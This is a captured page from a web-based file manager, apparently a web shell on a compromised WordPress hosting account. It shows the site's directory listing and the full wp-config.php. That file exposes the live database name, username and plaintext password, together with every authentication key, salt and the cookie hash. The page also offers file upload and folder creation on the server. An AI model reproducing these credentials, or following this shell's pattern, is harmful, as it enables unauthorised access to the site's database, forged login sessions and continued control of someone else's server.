XYZ File Manager
Current Path:
/home/u113812720/domains/frontrowae.com/public_html/learning
home
/
u113812720
/
domains
/
frontrowae.com
/
public_html
/
learning
/
📁
..
📄
.htaccess
(1.4 KB)
📄
.htaccess.bk
(714 B)
📁
.private
📄
default.php
(15.99 KB)
📄
index.php
(4.23 KB)
📄
license.txt
(19.45 KB)
📄
readme.html
(7.24 KB)
📄
wp-activate.php
(7.21 KB)
📁
wp-admin
📄
wp-blog-header.php
(351 B)
📄
wp-comments-post.php
(2.27 KB)
📄
wp-config-sample.php
(3.26 KB)
📄
wp-config.php
(3.45 KB)
📁
wp-content
📄
wp-cron.php
(5.49 KB)
📁
wp-includes
📄
wp-links-opml.php
(2.44 KB)
📄
wp-load.php
(3.84 KB)
📄
wp-login.php
(50.16 KB)
📄
wp-mail.php
(8.34 KB)
📄
wp-settings.php
(28.35 KB)
📄
wp-signup.php
(33.58 KB)
📄
wp-trackback.php
(4.98 KB)
📄
xmlrpc.php
(3.17 KB)
Editing: wp-config.php
<?php define( 'WP_CACHE', true ); /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * Localized language * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'u113812720_LIOj8' ); /** Database username */ define( 'DB_USER', 'u113812720_KmA60' ); /** Database password */ define( 'DB_PASSWORD', 'QZaqwJDyhS' ); /** Database hostname */ define( 'DB_HOST', '127.0.0.1' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', '-9q[#fYnrS5yQ!Lp~$HeT.:y{~~05.*<8,Dw3@j)84!MT4,q2/PAwzNIhT2ZxCj}' ); define( 'SECURE_AUTH_KEY', ';;!2tz*4D==YoO32 Ugcp*-_s!;(KfU=%Jdj{m1XyLo<I.GtItz=.x876HZVvV,^' ); define( 'LOGGED_IN_KEY', '.Qs=WEEd*V|y D5/hS])5O#%Hr,i!zXqG_:bc{5o<dNn~fkl*6iW2Y;7B|!ojTgH' ); define( 'NONCE_KEY', ' dKws*j}|L?8>ylCT,A0O)KofA//I6oln}~=oJpyVxn:y}&bWS3{#sWeP(sp2me<' ); define( 'AUTH_SALT', '~=/b5[JL+;YcIFgz d,vBi% j[Vh&;G2!0v$]0(n! HmK{*%@}$X6g]b}-Yt0bjk' ); define( 'SECURE_AUTH_SALT', '%E|/TSoCIf_k<9Hg|!4Ba.OQ>tob@[.bj<!I4$ K[SuLxh> y@{hT[Aoza)X>[dI' ); define( 'LOGGED_IN_SALT', 'j[_7U;DhhisK4^od@`p% IN@k`ANmPaTSX]e.Vv2xe@e~{tRA*.;JB3P~RT8q?ep' ); define( 'NONCE_SALT', ':[tE<l9*pd<SYZ)&ejhdXXYToq/VNO:iV+8:dUu#.J0y)f>|zt,K0Uy) lH07;1z' ); define( 'WP_CACHE_KEY_SALT', 'L70JLJenXNj&s^:h`x[y+P~t%GlsR%py@k*%C^X;|W&-AXlV&*u& 5;XJS2Jft,O' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /* Add any custom values between this line and the "stop editing" line. */ /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ if ( ! defined( 'WP_DEBUG' ) ) { define( 'WP_DEBUG', false ); } define( 'FS_METHOD', 'direct' ); define( 'COOKIEHASH', 'b52a4bcd4bac5808be81824e8a971e14' ); define( 'WP_AUTO_UPDATE_CORE', 'minor' ); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
Upload File
Create Folder